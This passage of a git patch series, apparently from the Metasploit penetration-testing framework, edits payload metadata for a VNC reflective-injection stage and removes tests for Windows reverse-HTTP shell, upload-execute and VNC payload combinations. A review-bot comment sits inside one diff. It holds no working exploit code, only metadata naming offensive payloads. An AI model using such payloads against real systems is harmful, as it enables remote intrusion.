 'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
 'Author' => [ 'sf' ],
- 'Session' => Msf::Sessions::VncInject ))
+ 'Session' => Msf::Sessions::VncInject
+ 'Convention' => 'sockedi -http -https'))
 end
 
 
From cb1a1ef692701403becc81e8bd6caf289732264a Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 11 Mar 2015 00:46:24 -0500
Subject: [PATCH 17/18] Remove bad stager+stage combinations from the payload set
---
 spec/modules/payloads_spec.rb | 121 ----------------------------------
 1 file changed, 121 deletions(-)
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index b5a171207d..698833c62a 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
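Review bot: In vncinject.rb the new `'Convention' => 'sockedi -http -https'` sits at the top level of the update_info hash, whereas shell.rb and upexec.rb in the previous commit place `'Convention'` inside `'PayloadCompat' => { ... }`; if the stager/stage compatibility check reads PayloadCompat rather than a top-level Convention key, this exclusion would not take effect and the http/https + vncinject combinations removed from payloads_spec.rb could still be generated. Worth confirming how Msf::Payload resolves Convention, or moving the key under PayloadCompat for consistency with the sibling stages. The missing comma after `Msf::Sessions::VncInject` is fixed by the last commit of this series. The method this hash belongs to starts before the hunk.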
@@ -2991,39 +2991,6 @@ describe 'modules/payloads', :content do
 reference_name: 'windows/shell/find_tag'
 end
 
- context 'windows/shell/reverse_hop_http' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_hop_http',
- 'stages/windows/shell'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/shell/reverse_hop_http'
- end
-
- context 'windows/shell/reverse_http' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_http',
- 'stages/windows/shell'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/shell/reverse_http'
- end
-
- context 'windows/shell/reverse_http_proxy_pstore' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_http_proxy_pstore',
- 'stages/windows/shell'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/shell/reverse_http_proxy_pstore'
- end
-
 context 'windows/shell/reverse_ipv6_tcp' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
@@ -3217,39 +3184,6 @@ describe 'modules/payloads', :content do
 reference_name: 'windows/upexec/find_tag'
 end
 
- context 'windows/upexec/reverse_hop_http' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_hop_http',
- 'stages/windows/upexec'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/upexec/reverse_hop_http'
- end
-
- context 'windows/upexec/reverse_http' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_http',
- 'stages/windows/upexec'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/upexec/reverse_http'
- end
-
- context 'windows/upexec/reverse_http_proxy_pstore' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_http_proxy_pstore',
- 'stages/windows/upexec'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/upexec/reverse_http_proxy_pstore'
- end
-
 context 'windows/upexec/reverse_ipv6_tcp' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
@@ -3393,39 +3327,6 @@ describe 'modules/payloads', :content do
 reference_name: 'windows/vncinject/find_tag'
 end
 
- context 'windows/vncinject/reverse_hop_http' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_hop_http',
- 'stages/windows/vncinject'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/vncinject/reverse_hop_http'
- end
-
- context 'windows/vncinject/reverse_http' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_http',
- 'stages/windows/vncinject'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/vncinject/reverse_http'
- end
-
- context 'windows/vncinject/reverse_http_proxy_pstore' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/reverse_http_proxy_pstore',
- 'stages/windows/vncinject'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/vncinject/reverse_http_proxy_pstore'
- end
-
 context 'windows/vncinject/reverse_ipv6_tcp' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
@@ -3578,17 +3479,6 @@ describe 'modules/payloads', :content do
 reference_name: 'windows/x64/shell/bind_tcp'
 end
 
- context 'windows/x64/shell/reverse_https' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/x64/reverse_https',
- 'stages/windows/x64/shell'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/x64/shell/reverse_https'
- end
-
 context 'windows/x64/shell/reverse_tcp' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
@@ -3631,17 +3521,6 @@ describe 'modules/payloads', :content do
 reference_name: 'windows/x64/vncinject/bind_tcp'
 end
 
- context 'windows/x64/vncinject/reverse_https' do
- it_should_behave_like 'payload cached size is consistent',
- ancestor_reference_names: [
- 'stagers/windows/x64/reverse_https',
- 'stages/windows/x64/vncinject'
- ],
- dynamic_size: false,
- modules_pathname: modules_pathname,
- reference_name: 'windows/x64/vncinject/reverse_https'
- end
-
 context 'windows/x64/vncinject/reverse_tcp' do
 it_should_behave_like 'payload cached size is consistent',
 ancestor_reference_names: [
From ad39adf9c2d9ef73609ab177a291187abe300a69 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 11 Mar 2015 00:49:07 -0500
Subject: [PATCH 18/18] Missing comma
---
 modules/payloads/stages/windows/vncinject.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb
index 2a634ddf58..5f78fd44ac 100644
--- a/modules/payloads/stages/windows/vncinject.rb
+++ b/modules/payloads/stages/windows/vncinject.rb
@@ -25,7 +25,7 @@ module Metasploit3
 'Name' => 'VNC Server (Reflective Injection)',
 'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
 'Author' => [ 'sf' ],
- 'Session' => Msf::Sessions::VncInject
+ 'Session' => Msf::Sessions::VncInject,
 'Convention' => 'sockedi -http -https'))
 end
 